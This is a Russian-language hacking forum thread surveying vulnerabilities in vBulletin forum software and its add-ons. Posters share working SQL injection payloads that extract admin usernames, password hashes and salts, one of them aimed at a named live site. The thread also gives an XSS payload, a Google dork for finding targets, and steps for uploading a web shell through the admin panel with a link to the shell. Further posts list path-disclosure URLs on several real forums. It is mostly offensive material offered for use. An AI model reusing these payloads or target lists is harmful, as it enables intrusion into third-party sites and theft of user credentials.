Форумы [Обзор уязвимостей vBulletin]

Обычно (90%) в нижнем углу написано "Администрирование".
Клацните туда и попадете в админку.

 

Поправлю вас, "Управление"

Может просто футер потерли, в целях безопастности.. а так, зайдите к пользователю в профиль, -> редактировать, откроеться админка (если прописана в config.php), или попробуйте выдать нарушение, откроеться модерка.. (только я не знаю, можно ли с модеркой дальше работать)

 

как я понял, в конфиге она не прописана Мб её вообще стерли нахер

 

зайдите под админом, дождитесь админа и посмотрите пути админки через "кто на сайте"

 

vBulletin 4.1.10 Full Path Disclosure

[Info]
# Author: linc0ln.dll
# Exploit Title: vBulletin 4.1.10 Full Path Disclosure
# Date: 16/01/2012
# Vendor or Software Link: http://www.vbulletin.com/# Category: WebApp
# Version: 4.1.10
# Contact: [email protected]
# Website: linc6.wordpress.com
# Greetings to: Mario_Vs | fir3 | fight3r | artii2 | pok3 | Upgreydd |VoltroN | amiugly | b00y4k4 |
[Vulnerability]

# Full Path Disclosure:

demo

 

Написано же "Full Path Disclosure". Раскрытие пути к скрипту на сервере.

 

Активная XSS

Уязвимы все версий

Требуются права модератора

Идём
Панель модератора -> Управление разделами -> Объявление [Редактировать]

Рабочий пример (проверка на работоспособность)

Эксплуатация обычная

 

Америку открыл. Это не XSS, а фича. На ачате тоже работает.

 

если админ заходил в admincp до этого, то куки будут с админкой, правда они не долго живут.

 

В 4.1.4 тоже SQL-inj есть. Смотри Patchlevel в vbulletin_global.js. Если там просто "Vbulletin 4.1.4", то радуйся. А если рядом написано "Patchlevel n", то можешь др. способы искать.

 

vBulletin 4.1.7 => 4.1.10 XSS Vulnerability

Vulnerability:
1.
Send New Private Message >
>
Message text > %22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (encode script UTF-8)

Watch the video: [http://vimeo.com/39049790]


1337day.com/exploits/17824

 

WAF мешает. Попробуй обойти.

 

Да нет вопросов
Поехали

EasyPage SQL-Injection​

Google Dork: intext:"vbulletin" inurl:"page.php?p=" [Result: 18 000]

File: /page.php

PHP:

[...]
$pageid = $_REQUEST['p'];
[...]
    $page = $vbulletin->db->query_first("
        SELECT *
        FROM " . TABLE_PREFIX . "easy_pages
        WHERE varname = '$pageid'
        LIMIT 1
    ");
[...]

PoC:

PHP:

http://stavropolregion.com/page.php?p=stavrop%27%20and%201=2%20union%20select%201,2,3,%28select+concat_ws%280x3b,username,password,salt%29+from+user+where+usergroupid=6%20limit%201%29,5%20--%20f

File: /admincp/easy_pages_admin.php

PHP:

[...]
if ($_REQUEST['do'] == 'edit')
{
    $pageid = $_REQUEST['pageid'];
     
    $page = $db->query_first("
        SELECT *
        FROM " . TABLE_PREFIX . "easy_pages
        WHERE pageid = $pageid
        LIMIT 1
    ");
[...]

PHP:

[...]
if ($_REQUEST['do'] == 'edit_update'){
 
$title = addslashes($_POST['title']);
$varname = addslashes($_POST['varname']);
$content = addslashes($_POST['content']);
 
            $vbulletin->db->query_write("UPDATE " . TABLE_PREFIX . "easy_pages
                                        SET title = '$title',
                                                                                        varname = '$varname',
                                            content = '$content',
                                            table_wrap = '" . $_POST['table_wrap'] . "'
                                            WHERE pageid = " . $_POST[pageid] . ";
                                    ");
 
    print_cp_redirect('easy_pages_admin.php');
}
[...]

PHP:

[...]
if ($_REQUEST['do'] == 'add_update'){
 
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$varname = addslashes($_POST['varname']);
            $vbulletin->db->query_write("INSERT INTO " . TABLE_PREFIX . "easy_pages
                                              SET  title = '$title',
                                                                                        varname = '$varname',
                                            content = '$content',
                                            table_wrap = '" . $_POST['table_wrap'] . "'
                                    ");
 
 
    print_cp_redirect('easy_pages_admin.php');
}
[...]

PHP:

[...]
if ($_REQUEST['do'] == 'delete_page'){
 
    $vbulletin->db->query_write("DELETE FROM " . TABLE_PREFIX . "easy_pages WHERE pageid = '" . $_REQUEST['pageid'] . "' LIMIT 1");
 
    print_cp_redirect('easy_pages_admin.php');
     
}
[...]

Было успешно найдено
(c) Boolean, 0x0000ed.com, 2012.
Было успешно взято
(с) Grabberz.com

 

vBulletin 3.8.x

PHP:

$ibforums->input['s_id'] = ibp_cleansql( $ibforums->input['s_id'] );


Раскрытие путей

 

Раскрытие путей в последней версии(4.2.0)
Нужны как минимум права модера.

Code:

http://localhost/modcp/index.php?do[]=head
https://localhost/modcp/index.php?do[]=home

 

Заливка шелла в 4.0.7 плюс\минус
Требуется доступ в админку.

HTML:

Заходим в админку
Продукты и модули -> Сохранить\загрузить модули
Выбираем плагин-шелл (приложен снизу).
Устанавливаем.
Переходим в Коммерческая подписка -> Управление подпиской

http://www.sendspace.com/file/rz0609

 

Exp.

PHP:

http://target.com/includes/blog_plugin_useradmin.php?do=usercss&u=[Sql]

 

vBulletin ChangUonDyU Advanced Statistics SQL Injection Vulnerability

# Exploit Title: vBulletin ChangUonDyU Advanced Statistics - SQL Injection
Vulnerability
# Google Dork: No Dork
# Date: 19/10/2012
# Exploit Author: Juno_okyo
# Vendor Homepage: http://hoiquantinhoc.com
# Software Link:
http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html
# Version: vBulletin 3 & 4
# Tested on: Windows 7
# CVE : http://www.vbulletin.com/
#
##############################################################################################
Vulnerability:
##############################################################################################

SQL Injection was found in ChangUonDyU Advanced Statistics.

Query on ajax.php

##############################################################################################
Exploitation:
##############################################################################################

ajax.php?do=inforum&listforumid=100) UNION SELECT
1,concat_ws(0x7c,user(),database(),version()),3,4,5,6,7,8,9,10-- -&result=20

or:

ajax.php?do=inforum&listforumid=100) UNION SELECT
1,2,3,4,5,6,concat_ws(0x7c,username,password,salt),8,9,10,11 from user
where userid=1-- -&result=20

##############################################################################################
Ex:
##############################################################################################

http://server/f/ajax.php?do=inforum&listforumid=100%29%20UNION%20SELECT%201,concat_ws%280x7c,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&result=20


##############################################################################################
More Details:
##############################################################################################

Website: http://junookyo.blogspot.com/
About Exploit:
http://junookyo.blogspot.com/2012/10/vbb-changuondyu-advanced-statistics-sql.html

##############################################################################################
Great thanks to James, Juno_okyo & J2TeaM, VNHack Group
##############################################################################################

 

vBulletin 4.2.0 Full Path Disclosure Vulnerability

Code:

The Full Path Disclosure is vBulletin 4.2.0, in forumrunner. With Full Path Disclosure you can get the path to the forum you're in and also (most of the times is the same) cpanel's username.    
To see it go to:   http://[path]/forumrunner/include/album.php   
It works in 90% of the forums.     

Example: 
http://www.mgcproducts.com/forumrunner/include/album.php http://atheistdiscussion.com/forumrunner/include/album.php http://apolyton.net/forumrunner/include/album.php http://www.romaniancommunity.net/forumrunner/include/album.php http://www.ghosthax.com/forumrunner/include/album.php http://www.reddotcity.net/forumrunner/include/album.php http://www.sevenskins.com/forum/forumrunner/include/album.php http://www.purevb.com/forumrunner/include/album.php http://forum.hackersbrasil.com.br/forumrunner/include/album.php

vBulletin 4.x/5.x multiple Full Puth Disclosure Vuln

Code:

/includes/api/commonwhitelist_2.php 
/includes/api/commonwhitelist_5.php 
/includes/api/commonwhitelist_6.php 
/includes/api/1/album_album.php 
/includes/api/1/album_editalbum.php 
/includes/api/1/album_latest.php 
/includes/api/1/album_overview.php 
/includes/api/1/album_picture.php 
/includes/api/1/album_user.php 
/includes/api/1/announcement_edit.php 
/includes/api/1/announcement_view.php 
/includes/api/1/api_cmscategorylist.php 
/includes/api/1/api_cmssectionlist.php 
/includes/api/1/api_forumlist.php 
/includes/api/1/api_getnewtop.php 
/includes/api/1/api_getsecuritytoken.php 
/includes/api/1/api_getsessionhash.php 
/includes/api/1/api_init.php 
/includes/api/1/api_mobilepublisher.php 
/includes/api/1/api_usersearch.php 
/includes/api/1/blog_blog.php 
/includes/api/1/blog_bloglist.php 
/includes/api/1/blog_comments.php 
/includes/api/1/blog_custompage.php 
/includes/api/1/blog_dosendtofriend.php 
/includes/api/1/blog_list.php 
/includes/api/1/blog_members.php 
/includes/api/1/blog_post_comment.php 
/includes/api/1/blog_post_editblog.php 
/includes/api/1/blog_post_editcomment.php 
/includes/api/1/blog_post_edittrackback.php 
/includes/api/1/blog_post_newblog.php 
/includes/api/1/blog_post_postcomment.php 
/includes/api/1/blog_post_updateblog.php 
/includes/api/1/blog_sendtofriend.php 
/includes/api/1/blog_subscription_entrylist.php 
/includes/api/1/blog_subscription_userlist.php 
/includes/api/1/blog_usercp_addcat.php 
/includes/api/1/blog_usercp_editcat.php 
/includes/api/1/blog_usercp_editoptions.php 
/includes/api/1/blog_usercp_editprofile.php 
/includes/api/1/blog_usercp_modifycat.php 
/includes/api/1/blog_usercp_updateprofile.php 
/includes/api/1/editpost_editpost.php 
/includes/api/1/editpost_updatepost.php 
/includes/api/1/forum.php 
/includes/api/1/forumdisplay.php 
/includes/api/1/inlinemod_domergeposts.php 
/includes/api/1/list.php 
/includes/api/1/login_lostpw.php 
/includes/api/1/member.php 
/includes/api/1/memberlist_search.php 
/includes/api/1/misc_showattachments.php 
/includes/api/1/misc_whoposted.php 
/includes/api/1/newreply_newreply.php 
/includes/api/1/newreply_postreply.php 
/includes/api/1/newthread_postthread.php 
/includes/api/1/newthread_newthread.php 
/includes/api/1/poll_newpoll.php 
/includes/api/1/poll_polledit.php 
/includes/api/1/poll_showresults.php 
/includes/api/1/private_editfolders.php
/includes/api/1/private_insertpm.php 
/includes/api/1/private_messagelist.php 
/includes/api/1/private_newpm.php 
/includes/api/1/private_showpm.php 
/includes/api/1/private_trackpm.php 
/includes/api/1/profile_editattachments.php 
/includes/api/1/profile_editoptions.php 
/includes/api/1/profile_editprofile.php 
/includes/api/1/register_addmember.php 
/includes/api/1/register_checkdate.php 
/includes/api/1/search_process.php 
/includes/api/1/search_showresults.php 
/includes/api/1/showthread.php 
/includes/api/1/subscription_addsubscription.php 
/includes/api/1/subscription_editfolders.php 
/includes/api/1/subscription_viewsubscription.php 
/includes/api/1/threadtag_managetags.php 
/includes/api/2/album_picture.php 
/includes/api/2/api_blogcategorylist.php 
/includes/api/2/blog_blog.php 
/includes/api/2/blog_bloglist.php 
/includes/api/2/blog_list.php 
/includes/api/2/blog_subscription_entrylist.php 
/includes/api/2/blog_subscription_userlist.php 
/includes/api/2/blog_usercp_groups.php 
/includes/api/2/content.php 
/includes/api/2/editpost_editpost.php 
/includes/api/2/forumdisplay.php 
/includes/api/2/member.php 
/includes/api/2/newreply_newreply.php 
/includes/api/2/forum.php 
/includes/api/2/poll_newpoll.php 
/includes/api/2/poll_polledit.php 
/includes/api/2/poll_showresults.php 
/includes/api/2/private_messagelist.php 
/includes/api/2/private_trackpm.php 
/includes/api/2/profile_editattachments.php 
/includes/api/2/search_showresults.php 
/includes/api/2/showthread.php 
/includes/api/3/api_gotonewpost.php 
/includes/api/4/album_user.php 
/includes/api/4/api_forumlist.php 
/includes/api/4/api_getnewtop.php 
/includes/api/4/breadcrumbs_create.php 
/includes/api/4/facebook_getforumid.php 
/includes/api/4/facebook_getnewforummembers.php 
/includes/api/4/get_vbfromfacebook.php 
/includes/api/4/login_facebook.php 
/includes/api/4/newreply_postreply.php 
/includes/api/4/newthread_postthread.php 
/includes/api/4/register.php 
/includes/api/4/register_addmember.php 
/includes/api/4/search_findusers.php 
/includes/api/4/subscription_viewsubscription.php 
/includes/api/5/api_init.php 
/includes/api/6/api_getnewtop.php 
/includes/api/6/api_gotonewpost.php 
/includes/api/6/content.php 
/includes/api/6/member.php 
/includes/api/6/newthread_newthread.php 
/includes/block/blogentries.php 
/includes/block/cmsarticles.php 
/includes/block/html.php 
/includes/block/newposts.php 
/includes/block/sgdiscussions.php 
/includes/block/tagcloud.php 
/includes/block/threads.php 
/forumrunner/include/subscriptions.php 
/forumrunner/include/search_forum.php 
/forumrunner/include/profile.php 
/forumrunner/include/post.php 
/forumrunner/include/pms.php 
/forumrunner/include/online.php 
/forumrunner/include/moderation.php 
/forumrunner/include/misc.php 
/forumrunner/include/login.php 
/forumrunner/include/get_thread.php 
/forumrunner/include/get_forum.php 
/forumrunner/include/cms.php 
/forumrunner/include/attach.php 
/forumrunner/include/announcement.php 
/forumrunner/include/album.php 
/forumrunner/support/vbulletin_methods.php 
/forumrunner/support/stringparser_bbcode.class.php 
/forumrunner/support/utils.php 
/forumrunner/support/other_methods.php 
/packages/skimlinks/hooks/postbit_display_complete.php 
/packages/skimlinks/hooks/showthread_complete.php 
/packages/skimlinks/hooks/userdata_start.php 

//...Leaked bY beBoss..//